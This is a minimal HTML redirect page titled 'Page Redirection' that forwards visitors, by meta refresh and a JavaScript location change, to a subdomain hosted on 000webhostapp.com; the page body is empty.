<DOCTYPE HTML>
<html lang="en-US">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="refresh" content="1; url=https://nauplioid-mouth.000webhostapp.com">  
        <script type="text/javascript">
               window.location.href = "https://nauplioid-mouth.000webhostapp.com"
        </script>
        <title>Page Redirection</title>
    </head>
    <body>
            </body>
</html>